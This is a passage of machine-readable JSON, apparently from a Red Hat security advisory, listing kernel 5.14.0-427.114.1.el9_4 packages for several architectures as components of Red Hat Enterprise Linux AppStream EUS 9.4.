"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-core-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-core-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-core-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-debug-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-devel-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-doc-0:5.14.0-427.114.1.el9_4.noarch as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-doc-0:5.14.0-427.114.1.el9_4.noarch"
},
"product_reference": "kernel-doc-0:5.14.0-427.114.1.el9_4.noarch",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-modules-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
